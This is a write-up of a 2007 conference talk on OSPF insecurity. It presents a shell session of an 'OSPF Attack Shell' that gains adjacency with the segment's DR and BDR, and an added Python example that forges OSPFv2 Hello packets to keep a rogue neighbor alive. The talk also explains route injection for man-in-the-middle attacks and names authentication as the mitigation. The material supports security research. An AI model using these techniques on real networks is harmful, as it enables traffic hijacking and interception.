Conference IT Underground, Prague 2007: OSPF routing protocol insecurities, still a problem?
IT Underground was held in Prague from March 7th to March 9th. Together with Dror Roecher (ERNW), I talked about OSPF security, and about a new tool I developed to show some tricks against OSPF routing infrastructure.
First part: learning OSPF
Dror also spoke about various theoretical attacks, and explained why they should be possible. One of these attacks was to inject a new route into the routing table of an OSPF router, basically to perform a man-in-the-middle attack. If such an attack were successful, we would be able to redirect traffic to an IP address of our choice, giving us the ability to read all network traffic. The interesting thing about OSPF is that, because link-state advertisements are flooded through the area, this injected route will be added to all OSPF routers that have "links" together (that is, not only the ones on the same broadcast domain as the attacker).
Slides for this part may be found on the IT Underground web site.
Second part: the tool
So, this tool basically shows that the injection of a new route is possible, and actually works. I developed this tool after being contacted by Dror, who was looking for someone able to verify his thoughts about OSPF attacks. I started the development by first implementing OSPF encoding and decoding at the frame level using Net::Frame. The tool was named OSPF Attack Shell, because it is built like a classical shell, into which you type commands.
In the first step of the demo, we showed how to become a true neighbor of the OSPF routers currently on the segment (the DR and the BDR). A true neighbor has an adjacency relationship with both the DR and the BDR. Here is how to do that:
    # ospf-ash.pl
    -- OSPF Attack Shell - 0.14 --
    Using device    : eth0
    Using source IP : 192.168.0.101
    Using source MAC: 00:13:a9:2c:5b:a3
    ash> listen
    Hello from: 192.168.0.21
    Found: DR : 192.168.0.22
    Found: BDR: 192.168.0.21
    Found: neighborList: 192.168.0.22
    ash> exchange
    192.168.0.22: exchange complete
    192.168.0.21: exchange complete
    ash> lock
The first command, "listen", just waits for a Hello frame to be emitted by an OSPF router on the broadcast network, and reads the DR, BDR and neighbor list from it. Then the "exchange" command tries to establish an adjacency (the OSPF database exchange) with the DR and the BDR. In our example, both adjacencies came up. Finally, the "lock" command keeps sending a Hello frame from our IP address, before the RouterDeadInterval expires, so that the neighborship with the DR and BDR is maintained.
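To make the "listen" and "lock" steps concrete, here is an added example (mine, not the OSPF Attack Shell code or anything from the slides) that builds and parses OSPFv2 Hello packets as laid out in RFC 2328 appendix A, including the packet checksum. It parses a constructed Hello such as the DR would multicast on the segment of the demo (router IDs are assumed equal to interface IPs, as the shell output suggests), applies the parameter checks a router performs before it will list us as a neighbor, and builds the Hello we would have to keep sending. The "exchange" step (database description packets) is not covered.

```python
"""OSPFv2 Hello builder/parser (RFC 2328 A.3.1, A.3.2). Added example,
not part of the OSPF Attack Shell. Addresses and parameters below are
constructed to mirror the demo; router IDs are assumed to equal IPs."""
import ipaddress
import struct

OSPF_VERSION = 2
OSPF_TYPE_HELLO = 1
OSPF_HEADER_LEN = 24      # ver, type, len, router id, area id, cksum, autype, auth(8)
OSPF_HELLO_FIXED_LEN = 20  # mask, hello int, options, prio, dead int, DR, BDR
OPT_E = 0x02              # External routing capability bit


def _ip(s):
    return int(ipaddress.IPv4Address(s))


def _ipstr(n):
    return str(ipaddress.IPv4Address(n))


def ospf_checksum(pkt):
    """One's-complement sum over the packet with the checksum field zeroed
    and the 64-bit authentication field (bytes 16..23) excluded (RFC 2328 D.4.1)."""
    data = pkt[:12] + b"\x00\x00" + pkt[14:16] + pkt[24:]
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_hello(router_id, area_id, mask, hello_int, dead_int, dr, bdr,
                neighbors=(), options=OPT_E, priority=0):
    """Serialise a Hello with AuType 0 (no authentication)."""
    body = struct.pack("!IHBBIII", _ip(mask), hello_int, options, priority,
                       dead_int, _ip(dr), _ip(bdr))
    body += b"".join(struct.pack("!I", _ip(n)) for n in neighbors)
    hdr = struct.pack("!BBHIIHH8s", OSPF_VERSION, OSPF_TYPE_HELLO,
                      OSPF_HEADER_LEN + len(body), _ip(router_id), _ip(area_id),
                      0, 0, b"\x00" * 8)
    pkt = hdr + body
    return pkt[:12] + struct.pack("!H", ospf_checksum(pkt)) + pkt[14:]


def parse_hello(pkt):
    """Decode a Hello; raise ValueError on truncation or a bad checksum."""
    if len(pkt) < OSPF_HEADER_LEN + OSPF_HELLO_FIXED_LEN:
        raise ValueError("truncated OSPF packet")
    ver, ptype, length, rid, aid, cksum, autype, _auth = struct.unpack(
        "!BBHIIHH8s", pkt[:OSPF_HEADER_LEN])
    if ver != OSPF_VERSION or ptype != OSPF_TYPE_HELLO:
        raise ValueError("not an OSPFv2 Hello")
    if length > len(pkt) or length < OSPF_HEADER_LEN + OSPF_HELLO_FIXED_LEN:
        raise ValueError("bad length field")
    pkt = pkt[:length]
    if autype == 0 and ospf_checksum(pkt) != cksum:
        raise ValueError("bad OSPF checksum")
    mask, hello_int, options, prio, dead_int, dr, bdr = struct.unpack(
        "!IHBBIII", pkt[OSPF_HEADER_LEN:OSPF_HEADER_LEN + OSPF_HELLO_FIXED_LEN])
    tail = pkt[OSPF_HEADER_LEN + OSPF_HELLO_FIXED_LEN:]
    if len(tail) % 4:
        raise ValueError("neighbor list not a multiple of 4 bytes")
    return {"router_id": _ipstr(rid), "area_id": _ipstr(aid), "autype": autype,
            "mask": _ipstr(mask), "hello_interval": hello_int, "options": options,
            "priority": prio, "dead_interval": dead_int, "dr": _ipstr(dr),
            "bdr": _ipstr(bdr),
            "neighbors": [_ipstr(n) for (n,) in struct.iter_unpack("!I", tail)]}


def hello_acceptable(ours, theirs):
    """RFC 2328 8.2/10.5: a router drops a Hello unless area ID, network mask,
    HelloInterval, RouterDeadInterval and the E-bit match its interface."""
    return (ours["area_id"] == theirs["area_id"] and ours["mask"] == theirs["mask"]
            and ours["hello_interval"] == theirs["hello_interval"]
            and ours["dead_interval"] == theirs["dead_interval"]
            and (ours["options"] & OPT_E) == (theirs["options"] & OPT_E))


def lock_hello(seen, our_router_id, heard_from):
    """The Hello to re-emit every HelloInterval: copies the segment parameters
    from the DR's Hello and lists every router we have heard from, so the DR
    sees its own Router ID in our neighbor list (2-Way) and keeps us alive."""
    return build_hello(our_router_id, seen["area_id"], seen["mask"],
                       seen["hello_interval"], seen["dead_interval"],
                       seen["dr"], seen["bdr"], neighbors=sorted(heard_from),
                       options=seen["options"])


def demo():
    # Constructed capture: what the DR 192.168.0.22 of the demo would send.
    dr_hello = build_hello("192.168.0.22", "0.0.0.0", "255.255.255.0", 10, 40,
                           "192.168.0.22", "192.168.0.21",
                           neighbors=["192.168.0.21"], priority=1)
    seen = parse_hello(dr_hello)                           # the "listen" step
    ours = {"area_id": "0.0.0.0", "mask": "255.255.255.0",  # assumed interface config
            "hello_interval": 10, "dead_interval": 40, "options": OPT_E}
    accepted = hello_acceptable(ours, seen)
    reply = parse_hello(lock_hello(seen, "192.168.0.101", {seen["router_id"]}))
    return {"seen": seen, "accepted": accepted, "reply": reply}


if __name__ == "__main__":
    r = demo()
    print("DR %s BDR %s accepted=%s" % (r["seen"]["dr"], r["seen"]["bdr"], r["accepted"]))
```

To put the "lock" Hello on the wire you would send it from a raw socket for IP protocol 89 to AllSPFRouters (224.0.0.5) with a TTL of 1, at the HelloInterval the DR advertises. Two caveats worth noting: the parameter check in hello_acceptable is why the tool first listens, since a Hello with the wrong mask, intervals or area is silently dropped; and if the router uses AuType 1 or 2 (simple password or MD5 authentication) rather than AuType 0, the packet built here is rejected outright, which is precisely the mitigation.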
Routing Protocol Security - still a problem? - Dror Roecher: http://www.ernw.de/content/e7/e181/e520/download523/ospf-sec_02_dr_ger.pdf
Net::Frame - GomoR: http://search.cpan.org/~gomor/